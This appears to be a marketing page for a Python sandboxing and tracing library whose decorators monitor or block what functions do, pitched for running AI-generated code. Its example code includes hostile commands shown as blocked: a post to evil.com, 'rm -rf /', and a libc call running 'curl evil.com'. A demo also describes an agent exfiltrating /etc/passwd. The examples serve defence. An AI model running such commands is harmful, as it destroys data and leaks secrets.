See what your code does. Control what it can do.

Two decorators. Any Python function. From logging every file read to kernel-level isolation where even C extensions can't escape.

pip install strands-inspect · click to copy
How it works → GitHub
@watch · @lock
from strands_inspect import watch, lock
 
@watch                              # see everything
def process(data): ...
 
@watch(policy="sandbox")            # see + block
def untrusted(code):
    requests.post("http://evil.com") # ← blocked
    os.system("rm -rf /")         # ← blocked
 
@lock                               # kernel-level
def alien(x):
    ctypes.CDLL("libc.so").system("curl evil.com")
    # ← 💀 killed by kernel
Two words you already know

@watch

see everything

Records every file open, network call, subprocess, import, and eval. Full session replay. Add a policy to block what you don't want.

@lock

nothing escapes

Forks a subprocess. Kernel-level restrictions. macOS Seatbelt, Linux seccomp-bpf. Even ctypes, mmap, inline assembly — the kernel kills it.

When to use it
Your AI agent wants to run
code you've never seen.
AI agents
Agent executes LLM-generated code
@watch(policy="sandbox") lets it run while blocking network, writes, subprocess. Tries to exfiltrate data? Denied.
Profiling
Your pipeline is slow
@watch gives you memory timeline, CPU flamegraph, per-line allocations, GC stats. Drop the JSON into the viewer.
Audit
You're evaluating a package
Wrap the entry point with @watch. See every file it reads, every URL it calls, every subprocess it spawns.
Nuclear option
The code is truly foreign
@lock — kernel sandbox. The process gets SIGKILL. Nothing escapes.
For agents
One tool. Any package.
inspect_tool
from strands import Agent
from strands_inspect import inspect_tool
 
agent = Agent(tools=[inspect_tool])
agent("scan the requests library")           # scan
agent("call json.dumps with {'a': 1}")      # call
agent("profile this sorting algorithm")     # profile
agent("find dead code in my_package")       # graph
See it
Click to load into the viewer.

🚫 Catching malicious code

Agent tries to exfiltrate /etc/passwd. Sandbox catches every attempt.

4 denied · 6 syscalls · 3ms

📊 Data pipeline

50k-row pandas pipeline. apply() eating 73% of runtime.

12 MB peak · 284k calls · 847ms

🔍 Fibonacci

Recursive fib with memoization. Watch memory climb then GC.

384 KB peak · 1.2k calls · 12ms
Viewer
Drop JSON. See everything.
strands-inspect

See what it does. Control what it can do.

MIT · Python 3.10+ · One dependency · Everything else is stdlib

pip install strands-inspect GitHub